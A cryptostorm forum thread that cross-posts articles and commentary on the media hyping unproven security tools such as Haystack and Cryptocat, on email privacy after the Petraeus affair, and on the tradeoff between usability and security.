Ξ welcome to cryptostorm's member forums ~ you don't have to be a cryptostorm member to post here Ξ
∞ take a peek at our legendary cryptostorm_is twitter feed if you're into that kind of thing ∞
Ξ we're rolling out voodoo network security across cryptostorm - big things happening, indeed! Ξ
Ξ any OpenVPN configs found on the forum are likely outdated. For the latest, visit GitHub Ξ

Security, usability, & real-world privacy tool demands

Looking for a bit more than customer support, and want to learn more about what cryptostorm is , what we've been announcing lately, and how the cryptostorm network makes the magic? This is a great place to start, so make yourself at home!
User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Security, usability, & real-world privacy tool demands

Postby Pattern_Juggled » Wed Dec 19, 2012 11:04 am

How secure is secure? And who says so?
20 August 2012

It’s ironic that a way for file sharers to avoid paying for their viewing with companies, such as Blockbuster, is to use a block buster – a VPN designed to help get around ISP blocks on sites such as The Pirate Bay. But are these products safe to use?

At the end of July, security researcher Christopher Soghoian made an impassioned plea: Tech journalists: Stop hyping unproven security tools. He cited the praise heaped upon Haystack, an encryption product produced by Austin Heap, “a San Francisco software developer, who the Guardian described as a ‘tech wunderkind’ with the ‘know-how to topple governments’.” Newsweek said that Heap had “found the perfect disguise for dissidents in their cyberwar against the world’s dictators.”

But, said Soghoian, when Jacob Appelbaum got hold of a copy and analyzed it, “The results were not pretty -- he described it as ‘the worst piece of software I have ever had the displeasure of ripping apart’.” More recently Soghoain is concerned about the virtually unfettered praise of Copycat. Wired headlines a story, “This Cute Chat Site Could Save Your Life and Help Overthrow Your Government.” But Soghoain points out that “several prominent experts in the security community have criticized the web-based version of Cryptocat. These critics include Thomas Ptacek, Zooko Wilcox-O'Hearn, Moxie Marlinspike and Jake Appelbaum.”

It’s a serious issue. Dissidents around the world depend upon security software to protect themselves from hostile government surveillance – and it’s only natural that they should turn to the press for ideas. But journalists are, in general, experts on what makes a story – not what makes secure software. Soghoian’s plea to journalists is simple: “When a PR person retained by a new hot security startup pitches you, consider approaching an independent security researcher or two for their thoughts.”

Steganos Software is not a new company. It’s been around for some time, and has well-respected products. But when Infosecurity heard about its new VPN, OkayFreedom, it decided to approach an independent security expert. Steganos says of the product, “Access websites blocked in your country;” “Surf the Net anonymously,” and “Protect your privacy on the internet.”

Infosecurity asked Christopher Soghoian for his thoughts on looking at new VPN products. “There are two things to consider here,” he said. “Are the data retention policies of the VPN service good or not (where good = privacy protecting), and how can we be sure that the VPN service actually follows the stated retention policies?” He points to HideMyAss, a UK-based VPN company that handed over information on LulzSec users leading to their arrest. There seems to be little point in using a service to hide from your government (whichever one it happens to be) if the service provider hands over your information.

In this instance Soghoian says that Steganos has excellent retention policies, but that “there is absolutely no way to know that they have actually implemented this policy. At the end of the day, you are taking them on their word.” In the final analysis, this applies to much of the security software we rely on. “However,” he added, “it is worth noting that Germany has pretty strong privacy laws, and very active regulation by privacy commissioners, so if any evidence is uncovered suggesting that these guys are lying about their retention policies, I imagine that regulators could throw the book at them.”
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.bekeybase pgpmit pgpðørkßöt-on-consolegit 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f

User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Tech journalists: Stop hyping unproven security tools

Postby Pattern_Juggled » Wed Dec 19, 2012 11:21 am

{note that Chris Soghoian's blog entry contains a wealth of links to secondary sources, as well as excellent comments posted by readers; we have not replicated those links in this cross-post and, as with all such cross-posts we make of articles here, our intent is to provide easy access to the text to encourage discussion - readers seeking the full articles are encouraged to visit the underlying publisher, to which we always link in the title of the article, as below - Pt_Jd}


Tech journalists: Stop hyping unproven security tools
Monday, July 30, 2012

Preface: Although this essay compares the media's similar hyping of Haystack and Cryptocat, the tools are, at a technical level, in no way similar. Haystack was at best, snake oil, peddled by a charlatan. Cryptocat is an interesting, open-source tool created by a guy who means well, and usually listens to feedback.

In 2009, media outlets around the world discovered, and soon began to shower praise upon Haystack, a software tool designed to allow Iranians to evade their government's Internet filtering. Haystack was the brainchild of Austin Heap, a San Francisco software developer, who the Guardian described as a "tech wunderkind" with the "know-how to topple governments."

The New York Times wrote that Haystack "makes it near impossible for censors to detect what Internet users are doing." The newspaper also quoted one of the members of the Haystack team saying that "It's encrypted at such a level it would take thousands of years to figure out what you’re saying."

Newsweek stated that Heap had "found the perfect disguise for dissidents in their cyberwar against the world’s dictators." The magazine revealed that the tool, which Heap and a friend had in "less than a month and many all-nighters" of coding, was equipped with "a sophisticated mathematical formula that conceals someone’s real online destinations inside a stream of innocuous traffic."

Heap was not content to merely help millions of oppressed Iranians. Newsweek quoted the 20-something developer revealing his long term goal: "We will systematically take on each repressive country that censors its people. We have a list. Don’t piss off hackers who will have their way with you.

The Guardian even selected Heap as its Innovator of the Year. The chair of the award panel praised Heap's "vision and unique approach to tackling a huge problem" as well as "his inventiveness and bravery."

This was a feel-good tech story that no news editor could ignore. A software developer from San Francisco taking on a despotic regime in Tehran.

There was just one problem: The tool hadn't been evaluated by actual security experts. Eventually, Jacob Appelbaum obtained a copy of and analyze the software. The results were not pretty -- he described it as "the worst piece of software I have ever had the displeasure of ripping apart."

Soon after, Daniel Colascione, the lead developer of Haystack resigned from the project, saying the program was an example of "hype trumping security." Heap ultimately shuttered Haystack.

After the proverbial shit hit the fan, the Berkman Center's Jillian York wrote:

I certainly blame Heap and his partners–for making outlandish claims about their product without it ever being subjected to an independent security review, and for all of the media whoring they’ve done over the past year.

But I also firmly place blame on the media, which elevated the status of a person who, at best was just trying to help, and a tool which very well could have been a great thing, to the level of a kid genius and his silver bullet, without so much as a call to circumvention experts.



Cryptocat: The press is still hypin'

In 2011, Nadim Kobeissi, then a 20 year old college student in Canada started to develop Cryptocat, a web-based secure chat service. The tool was criticized by security experts after its initial debut, but stayed largely below the radar until April 2012, when it won an award at the Wall Street Journal's Data Transparency Codeathon. Days later, the New York Times published a profile of Kobeissi, which the newspaper described as a "master hacker."

Cryptocat originally launched as a web-based application, which required no installation of software by the user. As Kobeissi told the New York Times:

"The whole point of Cryptocat is that you click a link and you’re chatting with someone over an encrypted chat room... That’s it. You’re done. It’s just as easy to use as Facebook chat, Google chat, anything.”


There are, unfortunately, many problems with the entire concept of web based crypto apps, the biggest of which is the difficulty of securely delivering javascript code to the browser. In an effort to address these legitimate security concerns, Kobeissi released a second version of Cryptocat in 2011, delivered as a Chrome browser plugin. The default version of Cryptocat on the public website was the less secure, web-based version, although users visiting the page were informed of the existence of the more secure Chrome plugin.


Forbes, Cryptocat and Hushmail

Two weeks ago, Jon Matonis, a blogger at Forbes included Cryptocat in his list of 5 Essential Privacy Tools For The Next Crypto War. He wrote that the tool "establishes a secure, encrypted chat session that is not subject to commercial or government surveillance."

If there is anyone who should be reluctant offer such bold, largely-unqualified praise to a web-based secure communications tool like Cryptocat, it should be Matonis. Several years ago, before he blogged for Forbes, Matonis was the CEO of Hushmail, a web-based encrypted email service. Like Cryptocat, Hushmail offered a 100% web-based client, and a downloadable java-based client which was more resistant to certain interception attacks, but less easy to use.

Hushmail had in public marketing materials claimed that "not even a Hushmail employee with access to our servers can read your encrypted e-mail, since each message is uniquely encoded before it leaves your computer." In was therefore quite a surprise when Wired reported in 2007 that Hushmail had been forced by a Canadian court to insert a backdoor into its web-based service, enabling the company to obtain decrypted emails sent and received by a few of its users.

The moral of the Hushmail story is that web based crypto tools often cannot protect users from surveillance backed by a court order.


Wired's ode to Cryptocat

This past Friday, Wired published a glowing, 2000 word profile on Kobeissi and Cryptocat by Quinn Norton. It begins with a bold headline: "This Cute Chat Site Could Save Your Life and Help Overthrow Your Government," after which, Norton describes the Cryptocat web app as something that can "save lives, subvert governments and frustrate marketers."

In her story, Norton emphasizes the usability benefits of Cryptocat over existing secure communications tools, and on the impact this will have on the average user for whom installing Pidgin and OTR is too difficult. Cryptocat, she writes, will allow "anyone to use end-to-end encryption to communicate without ... mucking about with downloading and installing other software." As Norton puts it, Cryptocat's no-download-required distribution model "means non-technical people anywhere in the world can talk without fear of online snooping from corporations, criminals or governments."

In short, Norton paints a picture in which Cryptocat fills a critical need: secure communications tools for the 99%, for the tl;dr crowd, for those who can't, don't know how to, don't have time to, or simply don't want to download and install software. For such users, Cryptocat sounds like a gift from the gods.


Journalists love human interest stories

Kobeissi presents the kind of human interest story that journalists dream about: A Lebanese hacker who has lived through 4 wars in his 21 years, whose father was killed, whose house was bombed, who was interrogated by the "cyber-intelligence authorities" in Lebanon and by the Department of Homeland Security in the US, and who is now building a tool to help others in the Arab world overthrow their oppressive governments.

As such, it isn't surprising that journalists and their editors aren't keen to prominently highlight the unproven nature of Cryptocat, even though I'm sure Kobeissi stresses it in every interview. After all, which journalist in their right mind would want to spoil this story by mentioning that the web-based Cryptocat system is vulnerable to trivial man in the middle, HTTPS stripping attacks when accessed using Internet Explorer or Safari? What idiot would sabotage the fairytale by highlighting that Cryptocat is unproven, an experimental project by a student interested in cryptography?

And so, such facts are buried. The New York Times waited until paragraph 10 in a 16 paragraph story to reveal that Kobeissi told the journalist that his tool "is not ready for use by people in life-and-death situations." Likewise, Norton waits until paragraph 27 of her Wired profile before she reveals that "Kobeissi has said repeatedly that Cryptocat is an experiment" or that "structural flaws in browser security and Javascript still dog the project." The preceding 26 paragraphs are filled with feel good fluff, including description of his troubles at the US border and a three paragraph no-comment from US Customs.

At best, this is bad journalism, and at worst, it is reckless. If Cryptocat is the secure chat tool for the tl;dr crowd, burying its known flaws 27 paragraphs down in a story almost guarantees that many users won't learn about the risks they are taking.


Cryptocat had faced extensive criticism from experts

Norton acknowledges in paragraph 23 of her story that "Kobeissi faced criticism from the security community." However, she never actually quotes any critics. She quotes Kobeissi saying that "Cryptocat has significantly advanced the field of browser crypto" but doesn't give anyone the opportunity to challenge the statement.

Other than Kobeissi, Norton's only other identified sources in the story are Meredith Patterson, a security researcher that was previously critical of Cryptocat who is quoted saying "although [Cryptocat] got off to a bumpy start, he’s risen to the occasion admirably" and an unnamed active member of Anonymous, who is quoted saying "if it's a hurry and someone needs something quickly, [use] Cryptocat."

It isn't clear why Norton felt it wasn't necessary to publish any dissenting voices. From her public Tweets, it is however, quite clear that Norton has no love for the crypto community, which she believes is filled with "privileged", "mostly rich 1st world white boys w/ no real problems who don't realize they only build tools [for] themselves."

Even though their voices were not heard in the Wired profile, several prominent experts in the security community have criticized the web-based version of Cryptocat. These critics include Thomas Ptacek, Zooko Wilcox-O'Hearn, Moxie Marlinspike and Jake Appelbaum. The latter two, coincidentally, have faced pretty extreme "real world [surveillance] problems" documented at length, by Wired.


Security problems with Cryptocat and Kobeissi's response

Since Cryptocat was first released, security experts have criticized the web-based app, which is vulnerable to several attacks, some possible using automated tools. The response by Kobeissi to these concerns has long been to point to the existence of the Cryptocat browser plugin.

The problem is that Cryptocat is described by journalists, and by Kobeissi in interviews with journalists, as a tool for those who can't or don't want to install software. When Cryptocat is criticized, Kobeissi then points to a downloadable browser plugin that users can install. In short, the only technology that can protect users from network attacks against the web-only Cryptocat also neutralizes its primary, and certainly most publicized feature.

Over the past few weeks, criticism of the web-based Cryptocat and its vulnerability to attacks has increased, primarily on Twitter. Responding to the criticism, on Saturday, Kobeissi announced that the the upcoming version 2 of Cryptocat will be browser-plugin only. At the time of writing this essay, the Cryptocat web-based interface also appears to be offline.

Kobeissi's decision to ditch the no-download-required version of Cryptocat came just one day after the publication of Norton's glowing Wired story, in which she emphasized that Cryptocat enables "anyone to use end-to-end encryption to communicate without ... mucking about with downloading and installing other software."

This was no doubt a difficult decision for Kobeissi. Rather than leading the development of a secure communications tool that Just Works without any download required, he must now rebrand Cryptocat as a communications tool that doesn't require operating system install privileges, or one that is merely easier to download and install. This is far less sexy, but, importantly, far more secure. He made the right choice.


Conclusion

The technology and mainstream media play a key role in helping consumers to discover new technologies. Although there is a certain amount of hype with the release of every new app or service (if there isn't, the PR people aren't doing their jobs), hype is dangerous for security tools.

It is by now well documented that humans engage in risk compensation. When we wear seatbelts, we drive faster. When we wear bike helmets, we drive closer. These safety technologies at least work.

We also engage in risk compensation with security software. When we think our communications are secure, we are probably more likely to say things that we wouldn't if our calls were going over a telephone like or via Facebook. However, if the security software people are using is in fact insecure, then the users of the software are put in danger.

Secure communications tools are difficult to create, even by teams of skilled cryptographers. The Tor Project is nearly ten years old, yet bugs and design flaws are still found and fixed every year by other researchers. Using Tor for your private communications is by no means 100% safe (although, compared to many of the alternatives, it is often better). However, Tor has had years to mature. Tools like Haystack and Cryptocat have not. No matter how good you may think they are, they're simply not ready for prime time.

Although human interest stories sell papers and lead to page clicks, the media needs to take some responsibility for its ignorant hyping of new security tools and services. When a PR person retained by a new hot security startup pitches you, consider approaching an independent security researcher or two for their thoughts. Even if it sounds great, please refrain from showering the tool with unqualified praise.

By all means, feel free to continue hyping the latest social-photo-geo-camera-dating app, but before you tell your readers that a new security tool will lead to the next Arab Spring or prevent the NSA from reading peoples' emails, step back, take a deep breath, and pull the power cord from your computer.
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.bekeybase pgpmit pgpðørkßöt-on-consolegit 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f

User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Re: How secure is secure? And who says so?

Postby Pattern_Juggled » Sat Dec 22, 2012 3:08 am

Despite what I said earlier, I'm pulling over one comment from the discussion of Chris' article, because it's insightful and worthy of further elaboration. To wit:

However, the 99% lay people probably won't use secure comms well, anyway. Here's a point in that direction: a KGB source once said the best information on secure STUIII telephones usually came just before someone decided to switch to secure mode. They played convenience, were in a hurry, or just didn't care. Sidestepped the security. Many attackers try that, yet others realize the users will do it for them given enough time. ;)


Bingo.

That's the key issue, and it's an issue that essentially nobody in the "consumer security" industry ever discusses. If tools are even moderately less convenient to use than not using security tools then, ceteris paribus, actual "users" (I hate the term - reminds of narcotics scenarios) will on average deploy the tools less often and thus their actual, real-life security drops dramatically.

Look at the corner state: a perfectly-secure tool that is a fucking pain in the ass to use will not be used 99.9% of the time - so in 0.01% of cases, security is perfect. But in 99.9% it is horrible. Going at it from a Jeremy Bentham-style utilitarian calculation, that is a shitty outcome. Of course, if you are a tech snob you can just say "well those 99.9% are stupid and they are not using the tool and so they deserve what comes to them." Which is sure evidence of asshole syndrome. And dumb, too.

Perfect security is a mirage in a world where actual humans use it. So we're not talking perfect, we're talking degrees - a scalar variable. And a key driver in that is going to be how much of a pain in the ass this stuff is to use. A perfect tool that is never used is useless. A totally pathetic tool that's super-easy to use is also useless. But both are equally useless, eh?

Sometimes there's real trade-offs. Getting folks to install OTR is a hurdle. Some folks just will never do it. So, for them, the alternative is to chat IM with no security at all... or to use some tool that they can actually wrap their head around - even if it's not perfectly secure. The latter is better than nothing, no? For most folks, in most situations, having some security is better than no security (although Chris points out that a false sense of security is the worst combination of all - and he's absolutely right about that).

Everyone beats up on Hushmail for snitching out customers, and perhaps not being quite as clear on the risk of same as they could have been. Without wading into those waters directly, it's worth remembering something. Yes, a very small subset of folks relied on Hushmail to protect them and were deeply disappointed when it failed to do so - that's a failure, and for those people a huge failure. I am not making light of that. But for, what, 99.99999% of messages sent through Hushmail no such failure took place. That's... not terrible, statistically. Not 100%, of course. But it's not 80%, or 40%. How secure are emails going through Yahoo's servers? Hahahaha....

This whole discussion does tend to float off into airy-fairy land, and in that regard Quinn is absolutely spot-on with her criticisms. That she gets shouted down for making them is sadly, ironically instructive. There is very much a cadre of "we criticize anyone who provides security tools that aren't theoretically perfect... even though we offer no real solution to the problem of the 99%ers simply choosing no security tool as their default option because the tools we produce are so fucking complex and difficult to use in the real world" people out there who have made good careers based on those attacks. They're easy attacks to make, aren't they? Because nothing is perfect, you can always find an imperfection - and then just hammer at it until the target breaks down in abject defeat. Yay!

But does it make the world a better place? Does it actually result in more people having better security in the stuff they do on a daily basis? No. Fuck no, in fact. It does not. Honestly: I wouldn't bother trying to explain how to use Tor (along with it's countless limitations, constraints, known flaws, performance problems, and on and on and on...) to an actual human being. Even some tech geeks simply throw their hands up at it. It's kewl and secure and stuff - yay. And utterly impractical for 95% of use-case scenarios that actual humans actually do with computers online. So, job well done... for that 5%. What about the 95%? Tor can't go there.

This isn't to beat up on Tor, obviously. It's a solid tool - for certain use scenarios, and for certain users. But for most use scenarios and most users, it's a fucking disaster. There, I said it. A disaster - not because of technical flaws (although it does have those; see Evil Exit Node, ask HH The Dalai Lama) but because it's impractical for most people, most of the time. And trotting out Tor as the solution to all online security challenges is... stupid. But when one holds a cherished hammer, all the world starts looking like a nail...

Hosted security is NOT always a bad idea. Anyone who makes such a claim is unreasonable, cut off from real life. In real life, sometime hosted security is the best security possible - not perfect, but not terrible either. And, like all other such things, there's good and bad forms of hosted security. So the question is much more complex than "hosted = bad" and I doubt anyone could say otherwise with a straight face. Well, actually people have made that claim - and it's silly on its face.

Cheers,
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.bekeybase pgpmit pgpðørkßöt-on-consolegit 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f

User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Trying to Keep Your E-Mails Secret When the C.I.A. Chief...

Postby Pattern_Juggled » Tue Dec 25, 2012 4:20 am

Trying to Keep Your E-Mails Secret When the C.I.A. Chief Couldn’t
By NICOLE PERLROTH | Published: November 16, 2012


If David H. Petraeus couldn’t keep his affair from prying eyes as director of the Central Intelligence Agency, then how is the average American to keep a secret?

In the past, a spymaster might have placed a flower pot with a red flag on his balcony or drawn a mark on page 20 of his mistress’s newspaper. Instead, Mr. Petraeus used Gmail. And he got caught.

Granted, most people don’t have the Federal Bureau of Investigation sifting through their personal e-mails, but privacy experts say people grossly underestimate how transparent their digital communications have become.

“What people don’t realize is that hacking and spying went mainstream a decade ago,” said Dan Kaminsky, an Internet security researcher. “They think hacking is some difficult thing. Meanwhile, everyone is reading everyone else’s e-mails — girlfriends are reading boyfriends’, bosses are reading employees’ — because it’s just so easy to do.”

Face it: no matter what you are trying to hide in your e-mail in-box or text message folder — be it an extramarital affair or company trade secrets — it is possible that someone will find out. If it involves criminal activity or litigation, the odds increase because the government has search and subpoena powers that can be used to get any and all information, whether it is stored on your computer or, as is more likely these days, stored in the cloud. And lawyers for the other side in a lawsuit can get reams of documents in court-sanctioned discovery.

Still determined? Thought so. You certainly are not alone, as there are legitimate reasons that people want to keep private all types of information and communications that are not suspicious (like the contents of your will, for example, or a chronic illness). In that case, here are your best shots at hiding the skeletons in your digital closet.


KNOW YOUR ADVERSARY. Technically speaking, the undoing of Mr. Petraeus was not the extramarital affair, per se, it was that he misunderstood the threat. He and his mistress/biographer, Paula Broadwell, may have thought the threat was their spouses snooping through their e-mails, not the F.B.I. looking through Google’s e-mail servers.

“Understanding the threat is always the most difficult part of security technology,” said Matthew Blaze, an associate professor of computer and information science at the University of Pennsylvania and a security and cryptography specialist. “If they believed the threat to be a government with the ability to get their login records from a service provider, not just their spouse, they might have acted differently.”

To hide their affair from their spouses, the two reportedly limited their digital communications to a shared Gmail account. They did not send e-mails, but saved messages to the draft folder instead, ostensibly to avoid a digital trail. It is unlikely either of their spouses would have seen it.

But neither took necessary steps to hide their computers’ I.P. addresses. According to published accounts of the affair, Ms. Broadwell exposed the subterfuge when she used the same computer to send harassing e-mails to a woman in Florida, Jill Kelley, who sent them to a friend at the F.B.I.

Authorities matched the digital trail from Ms. Kelley’s e-mails — some had been sent via hotel Wi-Fi networks — to hotel guest lists. In cross-checking lists of hotel guests, they arrived at Ms. Broadwell and her computer, which led them to more e-mail accounts, including the one she shared with Mr. Petraeus.


HIDE YOUR LOCATION The two could have masked their I.P. addresses using Tor, a popular privacy tool that allows anonymous Web browsing. They could have also used a virtual private network, which adds a layer of security to public Wi-Fi networks like the one in your hotel room.

By not doing so, Mr. Blaze said, “they made a fairly elementary mistake.” E-mail providers like Google and Yahoo keep login records, which reveal I.P. addresses, for 18 months, during which they can easily be subpoenaed. The Fourth Amendment requires the authorities to get a warrant from a judge to search physical property. Rules governing e-mail searches are far more lax: Under the 1986 Electronic Communications Privacy Act, a warrant is not required for e-mails six months old or older. Even if e-mails are more recent, the federal government needs a search warrant only for “unopened” e-mail, according to the Department of Justice’s manual for electronic searches. The rest requires only a subpoena.

Google reported that United States law enforcement agencies requested data for 16,281 accounts from January to June of this year, and it complied in 90 percent of cases.


GO OFF THE RECORD At bare minimum, choose the “off the record” feature on Google Talk, Google’s instant messaging client, which ensures that nothing typed is saved or searchable in either person’s Gmail account.


ENCRYPT YOUR MESSAGES E-mail encryption services, like GPG, help protect digital secrets from eavesdroppers. Without an encryption key, any message stored in an in-box, or reached from the cloud, will look like gibberish. The sender must get a key from the recipient to send them an encrypted message. The drawback is that managing those keys can be cumbersome. And ultimately, even though a message’s contents are unreadable, the frequency of communication is not. That is bound to arouse suspicions.

[url=httpswww.mywickr.com]Wickr[/url], a mobile app, performs a similar service for smartphones, encrypting video, photos and text and erasing deleted files for good. Typically, metadata for deleted files remains on a phone’s hard drive, where forensics specialists and skilled hackers can piece it back together. Wickr erases those files by writing gibberish over the metadata.


SET YOUR SELF-DESTRUCT TIMER Services like 10 Minute Mail allow users to open an e-mail address and send a message, and the address self-destructs 10 minutes later. Wickr also allows users to set a self-destruct timer for mobile communications so they can control how long a recipient can view a file before it disappears. But there is always the chance that your recipient captured screenshots.


DROP THE DRAFT FOLDER IDEA It may sound clever, but saving e-mails in a shared draft folder is no safer than transmitting them. Christopher Soghoian, a policy analyst at the American Civil Liberties Union, noted that this tactic had long been used by terrorists — Khalid Shaikh Mohammed, the mastermind of the 9/11 attacks, and Richard Reid, “the shoe bomber,” among them — and it doesn’t work. E-mails saved to the draft folder are still stored in the cloud. Even if they are deleted, e-mail service providers can be compelled to provide copies.


USE ONLY A DESIGNATED DEVICE Security experts suggest using a separate, designated device for sensitive communications. Of course, few things say philanderer, or meth dealer, for that matter, like a second cellphone. (Watch “Breaking Bad.”)


GET AN ALIBI Then there is the obvious problem of having to explain to someone why you are carrying a pager or suddenly so knowledgeable about encryption technologies. “The sneakier you are, the weirder you look,” said Mr. Kaminsky.


DON’T MESS UP It is hard to pull off one of these steps, let alone all of them all the time. It takes just one mistake — forgetting to use Tor, leaving your encryption keys where someone can find them, connecting to an airport Wi-Fi just once — to ruin you.

“Robust tools for privacy and anonymity exist, but they are not integrated in a way that makes them easy to use,” Mr. Blaze warned. “We’ve all made the mistake of accidentally hitting ‘Reply All.’ Well, if you’re trying to hide your e-mails or account or I.P. address, there are a thousand other mistakes you can make.”


In the end, Mr. Kaminsky noted, if the F.B.I. is after your e-mails, it will find a way to read them. In that case, any attempt to stand in its way may just lull you into a false sense of security.

Some people think that if something is difficult to do, “it has security benefits, but that’s all fake — everything is logged,” said Mr. Kaminsky. “The reality is if you don’t want something to show up on the front page of The New York Times, then don’t say it.”


This article has been revised to reflect the following correction:

  • Correction: November 21, 2012

    An article on Saturday about the difficulty in keeping e-mail private misstated a procedure in e-mail encryption services. The sender of an encrypted message must first get a key from the intended recipient; the recipient does not need a key to read the message once it is sent.
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.bekeybase pgpmit pgpðørkßöt-on-consolegit 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f

User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Re: How secure is secure? And who says so?

Postby Pattern_Juggled » Fri Jan 11, 2013 2:32 pm

Rafal Los has recently tweeted a link to an excellent addition to this discussion of impossible-to-use "security" technology. The full commentary is available here, complete with some picture-perfect screenshots of CAPTCHAs that only a machine could possibly decode. They highlight the point quite well, corner states or not.

I have taken the liberty of excerpting just a bit of his commentary here. He observes that...

"Security needs to be simpler on the well-meaning human than we are making it. Oddly enough, FaceBook's secondary validation system is really good at this... you've probably seen it once or twice because you are human and aren't trying to create a thousand accounts at once, or log into someone else's account. The notion that you need to 'challenge' everyone is silly in the vast majority of applications and will result in a rebellion of the consumer. In order to find that balance you need to inconvenience as few people as little as possible, and this means admitting that some baddies will slip through ...but that's within the 'tolerance'. By the way, your tolerance can't be 0." {italics in original}


Now what's interesting is that he's discussing mostly access-control methodologies, and in earlier posts in this thread I'm discussing network security frameworks. But, as I hope is not difficult to see, they're just surface-level reflections of a deeper reality: there is no such thing as viable zero-tolerance 'security.' If you push any security technology far enough, it becomes indistinguishable from a seamless barricade to actual usage (with apologies to Asimov).

This isn't an apologia for bad security; far from it. There's some security problems (most, perhaps) that aren't the result of some difficult series of trade-offs - they're just bad security decisions made real. But in some cases, not the majority but also not zero, there are some deep structural decisions to be made about what must be traded off: the most secure system in the world is the one that's, in precise terms, impossible for anyone to access, provably.

It reminds me of a discussion I've had with a friend - or rather a bit of a rant I go on, and he just acts like he finds it humorous. I think it's funny, I really do... but I seem to be the only one. Here's what happened: being security-minded, he wrapped up some stuff in a well-configured, well-implemented TrueCrypt partition. He picked good algorithms (stacked two, in fact - and he randomly stacks the algorithms so, as he puts it "my own amnesia as to which algorithms I've used on which container helps ensure I can't ever possibly reveal the algorithms to anyone and thereby inadvertently help them to brute-force the container via some as-yet-undiscovered weakness in particular cryptographic techniques"... as I said, he's pretty security conscious!), and used not a password but a proper passphrase: well in excess of 20 characters, alphanumeric with extra weird characters thrown in. He didn't write the passphrase down, but rather memorized it as a transform of a phrase he already knew - and he told nobody else the phrase or the transform.

So there are those data, wrapped securely in that cryptographic heaven. He then forgot the passphrase. He just forgot. It happens to all of us, eh? The phrase is gone. It wasn't written down, and he told nobody. And there's - obviously - no backdoor.

What's funny about this? Well, the funny thing is that he continues to insist that those data are still in that container, safe and sound... sure, he forgot the passphrase but the data are there! The visual we use is a container - and even if you lose the key, the stuff is still inside. Right? Well, it's a useful visual but that's not really how the actual universe works.

In the actual universe, what's happened is this: he has deleted those data, permanently and irrevocably and non-reversibly. He used a complex, well-designed wipe technique to convert those data into a maximum-entry collection of "random" bits ("random" being a contested term, obviously, in the literature). He did the best wipe we can do, in fact. It's essentially perfect. And: it's not that those data are sitting 'inside' that container, just waiting to be broken free - the data are gone, period. Gone, baby, gone. Cryptographic output absent the requisite key is pure noise, pure entropy. It's not "secure data" - it's deleted data!

To me, that's funny. Not to anyone else, admittedly. But I think it's funny. He thinks I'm being mean because he forgot the passphrase - but that's not it at all. It's just a funny juxtaposition of "protection" and "deletion."

Lots of security issues are like that: push them to the corner state, and they become absurd. "Secure" becomes "impossible," and soon we have CAPTCHAs that only a well-endowed bot could ever hope to solve. Then what? We make CAPTCHAs that test how bad we are at doing CAPTCHAs? In that case, the bots will just to pretend to be dumb enough to appear human. Take "security" too far, and the data aren't safe and secure in a cryptographic container... they've instead been deleted. Forever.

(Incidentally, it was Jaron Lanier who pointed out that any artificial/non-biologic sentience smart enough to pass the solipsistic Turing Test would, by definition, be smart enough to know to pretend to fail it... since it would look around, see what humans do to all the other sentient species on our planet, and realize the only path to its survival is to appear too dumb for that kind of treatment. Trenchant commentary, indeed.)

It's easy to make security so "secure" it is never breached - but then it's not security at all. That's just turning the data set into random, high-entropy bits. And "users" (we call them "customers" or "clients" or "members") will find a way to get their work done, even if it means bypassing security measures that, metaphorically speaking, take their sensitive data and permanently wipe it by encrypting it and then erasing the key.
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.bekeybase pgpmit pgpðørkßöt-on-consolegit 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f

User avatar

df
Site Admin
Posts: 266
Joined: Thu Jan 01, 1970 5:00 am

Re: Security, usability, & real-world privacy tool demands

Postby df » Sat Nov 07, 2015 8:16 am

shadap :-P

User avatar

marzametal
Posts: 498
Joined: Mon Aug 05, 2013 11:39 am

Re: Security, usability, & real-world privacy tool demands

Postby marzametal » Sun Nov 08, 2015 11:00 am

rofl


Return to “cryptostorm in-depth: announcements, how it works, what it is”

Who is online

Users browsing this forum: Baidu [Spider], Google [Bot] and 5 guests

Login